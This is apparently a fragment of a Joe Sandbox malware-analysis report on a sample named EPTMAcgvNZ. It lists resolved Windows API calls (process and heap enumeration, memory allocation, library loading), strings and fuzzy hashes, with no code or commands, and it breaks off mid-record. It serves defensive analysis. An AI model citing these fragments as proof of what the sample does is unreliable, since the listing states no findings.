                                                                                                                  • Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
                                                                                                                  • Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                  • Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68
                                                                                                                  APIs
                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02B14C57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                  • Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
                                                                                                                  • Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                  • Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                  • Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
                                                                                                                  • Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                  • Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4
                                                                                                                  APIs
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1263568516-0
                                                                                                                  • Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                  • Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
                                                                                                                  • Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                  • Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                  • Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                  • Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
                                                                                                                  • Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                  • Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                  APIs
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                  APIs
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1705453755-0
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  APIs
                                                                                                                  • GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 481472006-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 337ad80de26523312585dd798073f80bc2648116be0ac6775d459a67f91f93b6
                                                                                                                  • Instruction ID: aa01cb98ed2e4accbb3d845075dbed72fc7ffd512b30cefb4a665bc4976dd085
                                                                                                                  • Opcode Fuzzy Hash: 337ad80de26523312585dd798073f80bc2648116be0ac6775d459a67f91f93b6
                                                                                                                  • Instruction Fuzzy Hash: FF9155A1E592C44FE316AB7884BA7963F52CFA3344FDA00EEC1954F2E3DC1D98068B55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D
                                                                                                                    • Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                  • Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                  • Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
                                                                                                                  • Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                  • Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                  • Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                  • Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
                                                                                                                  • Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                  • Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10
                                                                                                                  APIs
                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                  • Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                  • Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
                                                                                                                  • Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
